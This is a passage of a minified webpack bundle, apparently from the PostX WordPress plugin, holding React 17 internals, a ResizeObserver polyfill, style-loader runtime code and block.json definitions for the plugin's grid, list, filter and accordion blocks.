e}},t.Component=b,t.PureComponent=h,t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=U,t.cloneElement=function(e,t,l){if(null==e)throw Error(m(267,e));var i=o({},e.props),n=e.key,r=e.ref,s=e._owner;if(null!=t){if(void 0!==t.ref&&(r=t.ref,s=k.current),void 0!==t.key&&(n=""+t.key),e.type&&e.type.defaultProps)var p=e.type.defaultProps;for(c in t)w.call(t,c)&&!x.hasOwnProperty(c)&&(i[c]=void 0===t[c]&&void 0!==p?p[c]:t[c])}var c=arguments.length-2;if(1===c)i.children=l;else if(1<c){p=Array(c);for(var u=0;u<c;u++)p[u]=arguments[u+2];i.children=p}return{$$typeof:a,type:e.type,key:n,ref:r,props:i,_owner:s}},t.createContext=function(e,t){return void 0===t&&(t=null),(e={$$typeof:r,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:n,_context:e},e.Consumer=e},t.createElement=T,t.createFactory=function(e){var t=T.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:s,render:e}},t.isValidElement=_,t.lazy=function(e){return{$$typeof:c,_payload:{_status:-1,_result:e},_init:L}},t.memo=function(e,t){return{$$typeof:p,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return B().useCallback(e,t)},t.useContext=function(e,t){return B().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return B().useEffect(e,t)},t.useImperativeHandle=function(e,t,l){return B().useImperativeHandle(e,t,l)},t.useLayoutEffect=function(e,t){return B().useLayoutEffect(e,t)},t.useMemo=function(e,t){return B().useMemo(e,t)},t.useReducer=function(e,t,l){return B().useReducer(e,t,l)},t.useRef=function(e){return B().useRef(e)},t.useState=function(e){return B().useState(e)},t.version="17.0.2"},67294:(e,t,l)=>{"use strict";e.exports=l(72408)},91033:(e,t,l)=>{"use strict";l.r(t),l.d(t,{default:()=>T});var o=function(){if("undefined"!=typeof Map)return Map;function e(e,t){var l=-1;return e.some((function(e,o){return e[0]===t&&(l=o,!0)})),l}return function(){function t(){this.__entries__=[]}return Object.defineProperty(t.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),t.prototype.get=function(t){var l=e(this.__entries__,t),o=this.__entries__[l];return o&&o[1]},t.prototype.set=function(t,l){var o=e(this.__entries__,t);~o?this.__entries__[o][1]=l:this.__entries__.push([t,l])},t.prototype.delete=function(t){var l=this.__entries__,o=e(l,t);~o&&l.splice(o,1)},t.prototype.has=function(t){return!!~e(this.__entries__,t)},t.prototype.clear=function(){this.__entries__.splice(0)},t.prototype.forEach=function(e,t){void 0===t&&(t=null);for(var l=0,o=this.__entries__;l<o.length;l++){var a=o[l];e.call(t,a[1],a[0])}},t}()}(),a="undefined"!=typeof window&&"undefined"!=typeof document&&window.document===document,i=void 0!==l.g&&l.g.Math===Math?l.g:"undefined"!=typeof self&&self.Math===Math?self:"undefined"!=typeof window&&window.Math===Math?window:Function("return this")(),n="function"==typeof requestAnimationFrame?requestAnimationFrame.bind(i):function(e){return setTimeout((function(){return e(Date.now())}),1e3/60)},r=["top","right","bottom","left","width","height","size","weight"],s="undefined"!=typeof MutationObserver,p=function(){function e(){this.connected_=!1,this.mutationEventsAdded_=!1,this.mutationsObserver_=null,this.observers_=[],this.onTransitionEnd_=this.onTransitionEnd_.bind(this),this.refresh=function(e,t){var l=!1,o=!1,a=0;function i(){l&&(l=!1,e()),o&&s()}function r(){n(i)}function s(){var e=Date.now();if(l){if(e-a<2)return;o=!0}else l=!0,o=!1,setTimeout(r,t);a=e}return s}(this.refresh.bind(this),20)}return e.prototype.addObserver=function(e){~this.observers_.indexOf(e)||this.observers_.push(e),this.connected_||this.connect_()},e.prototype.removeObserver=function(e){var t=this.observers_,l=t.indexOf(e);~l&&t.splice(l,1),!t.length&&this.connected_&&this.disconnect_()},e.prototype.refresh=function(){this.updateObservers_()&&this.refresh()},e.prototype.updateObservers_=function(){var e=this.observers_.filter((function(e){return e.gatherActive(),e.hasActive()}));return e.forEach((function(e){return e.broadcastActive()})),e.length>0},e.prototype.connect_=function(){a&&!this.connected_&&(document.addEventListener("transitionend",this.onTransitionEnd_),window.addEventListener("resize",this.refresh),s?(this.mutationsObserver_=new MutationObserver(this.refresh),this.mutationsObserver_.observe(document,{attributes:!0,childList:!0,characterData:!0,subtree:!0})):(document.addEventListener("DOMSubtreeModified",this.refresh),this.mutationEventsAdded_=!0),this.connected_=!0)},e.prototype.disconnect_=function(){a&&this.connected_&&(document.removeEventListener("transitionend",this.onTransitionEnd_),window.removeEventListener("resize",this.refresh),this.mutationsObserver_&&this.mutationsObserver_.disconnect(),this.mutationEventsAdded_&&document.removeEventListener("DOMSubtreeModified",this.refresh),this.mutationsObserver_=null,this.mutationEventsAdded_=!1,this.connected_=!1)},e.prototype.onTransitionEnd_=function(e){var t=e.propertyName,l=void 0===t?"":t;r.some((function(e){return!!~l.indexOf(e)}))&&this.refresh()},e.getInstance=function(){return this.instance_||(this.instance_=new e),this.instance_},e.instance_=null,e}(),c=function(e,t){for(var l=0,o=Object.keys(t);l<o.length;l++){var a=o[l];Object.defineProperty(e,a,{value:t[a],enumerable:!1,writable:!1,configurable:!0})}return e},u=function(e){return e&&e.ownerDocument&&e.ownerDocument.defaultView||i},d=v(0,0,0,0);function m(e){return parseFloat(e)||0}function g(e){for(var t=[],l=1;l<arguments.length;l++)t[l-1]=arguments[l];return t.reduce((function(t,l){return t+m(e["border-"+l+"-width"])}),0)}var y="undefined"!=typeof SVGGraphicsElement?function(e){return e instanceof u(e).SVGGraphicsElement}:function(e){return e instanceof u(e).SVGElement&&"function"==typeof e.getBBox};function b(e){return a?y(e)?function(e){var t=e.getBBox();return v(0,0,t.width,t.height)}(e):function(e){var t=e.clientWidth,l=e.clientHeight;if(!t&&!l)return d;var o=u(e).getComputedStyle(e),a=function(e){for(var t={},l=0,o=["top","right","bottom","left"];l<o.length;l++){var a=o[l],i=e["padding-"+a];t[a]=m(i)}return t}(o),i=a.left+a.right,n=a.top+a.bottom,r=m(o.width),s=m(o.height);if("border-box"===o.boxSizing&&(Math.round(r+i)!==t&&(r-=g(o,"left","right")+i),Math.round(s+n)!==l&&(s-=g(o,"top","bottom")+n)),!function(e){return e===u(e).document.documentElement}(e)){var p=Math.round(r+i)-t,c=Math.round(s+n)-l;1!==Math.abs(p)&&(r-=p),1!==Math.abs(c)&&(s-=c)}return v(a.left,a.top,r,s)}(e):d}function v(e,t,l,o){return{x:e,y:t,width:l,height:o}}var h=function(){function e(e){this.broadcastWidth=0,this.broadcastHeight=0,this.contentRect_=v(0,0,0,0),this.target=e}return e.prototype.isActive=function(){var e=b(this.target);return this.contentRect_=e,e.width!==this.broadcastWidth||e.height!==this.broadcastHeight},e.prototype.broadcastRect=function(){var e=this.contentRect_;return this.broadcastWidth=e.width,this.broadcastHeight=e.height,e},e}(),f=function(e,t){var l,o,a,i,n,r,s,p=(o=(l=t).x,a=l.y,i=l.width,n=l.height,r="undefined"!=typeof DOMRectReadOnly?DOMRectReadOnly:Object,s=Object.create(r.prototype),c(s,{x:o,y:a,width:i,height:n,top:a,right:o+i,bottom:n+a,left:o}),s);c(this,{target:e,contentRect:p})},k=function(){function e(e,t,l){if(this.activeObservations_=[],this.observations_=new o,"function"!=typeof e)throw new TypeError("The callback provided as parameter 1 is not a function.");this.callback_=e,this.controller_=t,this.callbackCtx_=l}return e.prototype.observe=function(e){if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");if("undefined"!=typeof Element&&Element instanceof Object){if(!(e instanceof u(e).Element))throw new TypeError('parameter 1 is not of type "Element".');var t=this.observations_;t.has(e)||(t.set(e,new h(e)),this.controller_.addObserver(this),this.controller_.refresh())}},e.prototype.unobserve=function(e){if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");if("undefined"!=typeof Element&&Element instanceof Object){if(!(e instanceof u(e).Element))throw new TypeError('parameter 1 is not of type "Element".');var t=this.observations_;t.has(e)&&(t.delete(e),t.size||this.controller_.removeObserver(this))}},e.prototype.disconnect=function(){this.clearActive(),this.observations_.clear(),this.controller_.removeObserver(this)},e.prototype.gatherActive=function(){var e=this;this.clearActive(),this.observations_.forEach((function(t){t.isActive()&&e.activeObservations_.push(t)}))},e.prototype.broadcastActive=function(){if(this.hasActive()){var e=this.callbackCtx_,t=this.activeObservations_.map((function(e){return new f(e.target,e.broadcastRect())}));this.callback_.call(e,t,e),this.clearActive()}},e.prototype.clearActive=function(){this.activeObservations_.splice(0)},e.prototype.hasActive=function(){return this.activeObservations_.length>0},e}(),w="undefined"!=typeof WeakMap?new WeakMap:new o,x=function e(t){if(!(this instanceof e))throw new TypeError("Cannot call a class as a function.");if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");var l=p.getInstance(),o=new k(t,l,this);w.set(this,o)};["observe","unobserve","disconnect"].forEach((function(e){x.prototype[e]=function(){var t;return(t=w.get(this))[e].apply(t,arguments)}}));const T=void 0!==i.ResizeObserver?i.ResizeObserver:x},71169:e=>{e.exports=function(e){return e.replace(/[A-Z]/g,(function(e){return"-"+e.toLowerCase()})).toLowerCase()}},16672:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(38902),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},42413:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(30439),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},40619:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(11211),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},74424:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(31022),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},43958:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(70398),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},93332:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(33099),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},66584:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(14437),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},98906:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(97921),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},48515:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(10912),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},46764:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(4),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},19552:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(99243),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},78963:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(84586),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},65907:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(26107),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},41115:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(87616),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},87624:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(6500),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},26135:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(30024),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},64201:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(71729),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},88106:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(4432),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},93379:e=>{"use strict";var t=[];function l(e){for(var l=-1,o=0;o<t.length;o++)if(t[o].identifier===e){l=o;break}return l}function o(e,o){for(var i={},n=[],r=0;r<e.length;r++){var s=e[r],p=o.base?s[0]+o.base:s[0],c=i[p]||0,u="".concat(p," ").concat(c);i[p]=c+1;var d=l(u),m={css:s[1],media:s[2],sourceMap:s[3],supports:s[4],layer:s[5]};if(-1!==d)t[d].references++,t[d].updater(m);else{var g=a(m,o);o.byIndex=r,t.splice(r,0,{identifier:u,updater:g,references:1})}n.push(u)}return n}function a(e,t){var l=t.domAPI(t);return l.update(e),function(t){if(t){if(t.css===e.css&&t.media===e.media&&t.sourceMap===e.sourceMap&&t.supports===e.supports&&t.layer===e.layer)return;l.update(e=t)}else l.remove()}}e.exports=function(e,a){var i=o(e=e||[],a=a||{});return function(e){e=e||[];for(var n=0;n<i.length;n++){var r=l(i[n]);t[r].references--}for(var s=o(e,a),p=0;p<i.length;p++){var c=l(i[p]);0===t[c].references&&(t[c].updater(),t.splice(c,1))}i=s}}},90569:e=>{"use strict";var t={};e.exports=function(e,l){var o=function(e){if(void 0===t[e]){var l=document.querySelector(e);if(window.HTMLIFrameElement&&l instanceof window.HTMLIFrameElement)try{l=l.contentDocument.head}catch(e){l=null}t[e]=l}return t[e]}(e);if(!o)throw new Error("Couldn't find a style target. This probably means that the value for the 'insert' parameter is invalid.");o.appendChild(l)}},19216:e=>{"use strict";e.exports=function(e){var t=document.createElement("style");return e.setAttributes(t,e.attributes),e.insert(t,e.options),t}},3565:(e,t,l)=>{"use strict";e.exports=function(e){var t=l.nc;t&&e.setAttribute("nonce",t)}},7795:e=>{"use strict";e.exports=function(e){if("undefined"==typeof document)return{update:function(){},remove:function(){}};var t=e.insertStyleElement(e);return{update:function(l){!function(e,t,l){var o="";l.supports&&(o+="@supports (".concat(l.supports,") {")),l.media&&(o+="@media ".concat(l.media," {"));var a=void 0!==l.layer;a&&(o+="@layer".concat(l.layer.length>0?" ".concat(l.layer):""," {")),o+=l.css,a&&(o+="}"),l.media&&(o+="}"),l.supports&&(o+="}");var i=l.sourceMap;i&&"undefined"!=typeof btoa&&(o+="\n/*# sourceMappingURL=data:application/json;base64,".concat(btoa(unescape(encodeURIComponent(JSON.stringify(i))))," */")),t.styleTagTransform(o,e,t.options)}(t,e,l)},remove:function(){!function(e){if(null===e.parentNode)return!1;e.parentNode.removeChild(e)}(t)}}}},44589:e=>{"use strict";e.exports=function(e,t){if(t.styleSheet)t.styleSheet.cssText=e;else{for(;t.firstChild;)t.removeChild(t.firstChild);t.appendChild(document.createTextNode(e))}}},87462:(e,t,l)=>{"use strict";function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var l=arguments[t];for(var o in l)Object.prototype.hasOwnProperty.call(l,o)&&(e[o]=l[o])}return e},o.apply(this,arguments)}l.d(t,{Z:()=>o})},16998:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/accordion-item","title":"Accordion Item","category":"ultimate-post","description":"Add desired blocks to inner sections.","parent":["ultimate-post/accordion"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post"}')},10981:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/accordion","title":"Accordion","category":"ultimate-post","keywords":["accordion","toggle","collapse","expand","fag","postx accordion"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},82402:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advanced-list","title":"List - PostX","category":"ultimate-post","keywords":["list","list postx","advanced list","icon list"],"supports":{"align":["center","wide","full"],"html":false,"reusable":false},"textdomain":"ultimate-post"}')},58063:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/list","title":"List","description":"Create & customize a list item","category":"ultimate-post","parent":["ultimate-post/advanced-list"],"textdomain":"ultimate-post"}')},7110:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advanced-filter","title":"Advanced Post Filter","category":"ultimate-post","keywords":["Advanced Post Filter","Post Filter","Filter Block","PostX Filter","Post Grid","Grid View","Article","Grid","Post Listing"],"supports":{"inserter":false},"usesContext":["postId"],"providesContext":{"advanced-filter/cId":"clientId"},"textdomain":"ultimate-post"}')},54685:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/filter-clear","title":"Clear Filter","category":"ultimate-post","keywords":["Clear Filter","Reset Filter","PostX Filter","Post Grid","Grid View","Article","Grid","Post Listing","filter"],"textdomain":"ultimate-post","supports":{},"usesContext":["post-grid-parent/postBlockClientId","advanced-filter/cId"],"ancestor":["ultimate-post/advanced-filter"]}')},31631:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/filter-search-adv","title":"Search Filter","category":"ultimate-post","keywords":["Search Filter","Post Filter","filter"],"textdomain":"ultimate-post","supports":{},"usesContext":["post-grid-parent/postBlockClientId"],"ancestor":["ultimate-post/advanced-filter"]}')},50941:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/filter-select","title":"Select Filter","category":"ultimate-post","keywords":["PostX Filter","Post Filter","filter"],"textdomain":"ultimate-post","supports":{},"usesContext":["post-grid-parent/postBlockClientId"],"ancestor":["ultimate-post/advanced-filter"]}')},12728:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advanced-search","title":"Search - PostX","category":"ultimate-post","textdomain":"ultimate-post","keywords":["Advanced Search","Search Block","Search Result","Search Form"],"supports":{"align":["center","wide","full"]}}')},14331:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/button-group","title":"Button Group","category":"ultimate-post","keywords":["button group","buttons","group","btn","button"],"supports":{"align":["center","wide","full"],"html":false,"reusable":false},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},4405:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"parent":["ultimate-post/button-group"],"name":"ultimate-post/button","description":"Create & customize button","title":"Button","category":"ultimate-post","supports":{"html":false,"reusable":false},"textdomain":"ultimate-post"}')},28166:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/dark-light","title":"Dark/Light - PostX","category":"ultimate-post","keywords":["dark","light","night mode"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},83408:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/gallery","title":"PostX Gallery","category":"ultimate-post","keywords":["gallery","image","media"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},19209:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/heading","title":"Heading","category":"ultimate-post","description":"Display heading or title with the ultimate controls.","textdomain":"ultimate-post","keywords":["heading","title","section"],"supports":{"align":["center","wide","full"]}}')},2204:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/image","title":"Image","description":"Display images with the ultimate controls.","category":"ultimate-post","keywords":["Image","Media","Gallery"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},59963:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/news-ticker","title":"News Ticker","category":"ultimate-post","keywords":["News Ticker","Post News"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},41850:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-1","title":"Post Grid #1","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},98453:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-2","title":"Post Grid #2","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},18781:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-3","title":"Post Grid #3","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},57433:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-4","title":"Post Grid #4","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},89122:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-5","title":"Post Grid #5","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},35341:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-6","title":"Post Grid #6","category":"ultimate-post","description":"Post Grid in gradient display with tile blocks.","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},40577:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-7","title":"Post Grid #7","category":"ultimate-post","description":"Post Grid with gradient display in vertical overlay","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},53991:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-pagination","title":"Advanced Post Pagination","category":"ultimate-post","keywords":["Pagination"],"supports":{"inserter":false},"usesContext":["postId","post-grid-parent/postBlockClientId","post-grid-parent/pagi"],"textdomain":"ultimate-post","ancestor":["ultimate-post/post-grid-parent"]}')},26887:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-parent","title":"Post Block","category":"ultimate-post","description":"Post Block from PostX.","keywords":["Post Grid","Grid View","Post Listing","Article","Grid"],"supports":{"align":["center","wide","full"],"inserter":false,"reusable":false},"providesContext":{"post-grid-parent/postBlockClientId":"cId","post-grid-parent/pagi":"pagi"},"usesContext":["postId"],"textdomain":"ultimate-post"}')},20629:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-1","title":"Post List #1","description":"Listing your posts in the classic style.","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},95596:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-2","description":"Listing our posts with a big post at the top.","title":"Post List #2","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},2719:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-3","title":"Post List #3","description":"Listing your posts with images on the left side.","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List 